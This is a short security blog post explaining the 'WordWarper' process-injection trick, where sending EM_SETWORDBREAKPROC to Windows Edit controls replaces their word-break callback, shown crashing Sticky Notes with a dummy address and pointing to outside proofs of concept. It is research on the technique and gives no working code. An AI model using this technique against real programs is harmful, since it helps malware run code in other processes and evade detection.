WordWarper – (not a ) new code injection trick


Internet is a cool place, because luckily there are some good souls who points us in a right direction. The technique I described below was presented as early as July 2003 by Oliver Lavery from iDefense! Thanks to modexp for pointing it out.

Old Post

This is a trivial case of yet another functionality available that can help to execute code in a remote process. Same as with PROPagate technique, it only affects selected windows, but it can of course be used as an evasion, especially in early stages of compromise.

Edit controls (including Rich Edit) are very common Windows controls present in most applications. They are either embedded directly, or as subclassed windows. When they display text in multiline mode they use so-called EditWordBreakProc callback function. Anytime the control needs to do something related to word wrapping the procedure will be called.

One can modify this function for any window by sending EM_SETWORDBREAKPROC message to it. If windows is an Edit control or its descendant, funny things may happen.

In order to see which windows are susceptible to such modification I created a simple demo program that basically sends this message to every window on my desktop.

After looking around and running some potential victim programs I quickly found a good candidate to demo the technique: The Sticky Notes (StikyNot).

I ran it under the debugger to catch the moment it crashes, and then ran my test program. It changed the procedure for every window to 0x12345678.

And this is what happens when you start typing in Sticky Notes after the procedure was changed:

I bet there are more programs that can be targeted this way, but as usual, I leave it as a home work to the reader :-

Modexp shared a nice POC here.
Csaba shared a nice POC here.